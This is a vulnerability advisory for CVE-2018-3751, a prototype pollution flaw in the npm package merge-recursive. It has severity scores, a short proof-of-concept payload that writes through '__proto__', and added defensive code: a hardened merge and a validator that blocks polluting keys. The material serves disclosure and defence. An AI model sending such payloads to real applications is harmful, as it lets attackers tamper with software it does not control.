
CVE-2018-3751 merge-recursive

Package

Manager: npm
Name: merge-recursive
Vulnerable Version: >=0 <=0.0.3

Severity

Level: Critical

CVSS v3.1: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00332 (percentile 0.55462)

Details

Prototype Pollution in merge-recursive

All versions of `merge-recursive` are vulnerable to Prototype Pollution. When malicious user input is merged with another object, it allows the attacker to modify the prototype of Object via `__proto__`, causing the addition or modification of an existing property.

Proof of concept:

```js
var merge = require('merge-recursive').recursive;
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';
// `a` never takes part in the merge; it only shows that the property
// lands on Object.prototype and is therefore inherited by every object.
var a = {};
console.log("Before : " + a.oops);
merge({}, JSON.parse(malicious_payload));
console.log("After : " + a.oops);
```

Recommendation

There is currently no fix available.
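As an added example, not code from the advisory or from the merge-recursive package: a recursive merge hardened against this class of bug, and a validator that reports prototype-polluting keys in untrusted JSON so the input can be rejected before any merge runs. The function names, the `UNSAFE_KEYS` set and the nested sample payload are assumptions of this example.

```javascript
// Added example, not code from the advisory or the merge-recursive package.
const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(value) {
  if (value === null || typeof value !== 'object') return false;
  const proto = Object.getPrototypeOf(value);
  return proto === Object.prototype || proto === null;
}

// Deep-merge `source` into `target`, copying only own keys and refusing the
// keys that would let the merge walk onto Object.prototype.
function safeMergeRecursive(target, source) {
  for (const key of Object.keys(source)) {
    if (UNSAFE_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      // Recurse only into an own plain object on the target; otherwise start
      // fresh so an inherited property is never used as the merge destination.
      const own = Object.prototype.hasOwnProperty.call(target, key) && isPlainObject(target[key]);
      target[key] = safeMergeRecursive(own ? target[key] : {}, value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Report the dotted path of every prototype-polluting key in parsed input,
// so a request can be rejected at the boundary instead of being merged.
function findUnsafeKeys(value, path = '') {
  const hits = [];
  if (!isPlainObject(value) && !Array.isArray(value)) return hits;
  for (const key of Object.keys(value)) {
    const here = path ? path + '.' + key : key;
    if (UNSAFE_KEYS.has(key)) hits.push(here);
    hits.push(...findUnsafeKeys(value[key], here));
  }
  return hits;
}

// Constructed input: the advisory's payload plus a nested constructor/prototype
// variant. JSON.parse creates "__proto__" as an own key, so Object.keys sees it.
const payload = JSON.parse(
  '{"__proto__":{"oops":"It works !"},"cfg":{"constructor":{"prototype":{"x":1}}}}'
);

console.log(findUnsafeKeys(payload));          // [ '__proto__', 'cfg.constructor', 'cfg.constructor.prototype' ]
console.log(safeMergeRecursive({}, payload));  // { cfg: {} }
console.log(({}).oops);                        // undefined: Object.prototype untouched
```

The `constructor` and `prototype` keys are refused as well because `obj.constructor.prototype` reaches the same Object.prototype without ever spelling `__proto__`.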

Metadata

Created: 2018-09-18T13:46:06Z
Modified: 2023-09-12T18:47:20Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/09/GHSA-cvxm-f295-x957/GHSA-cvxm-f295-x957.json
CWE IDs: ["CWE-20"]
Alternative ID: GHSA-cvxm-f295-x957
Finding: F184
Auto approve: 1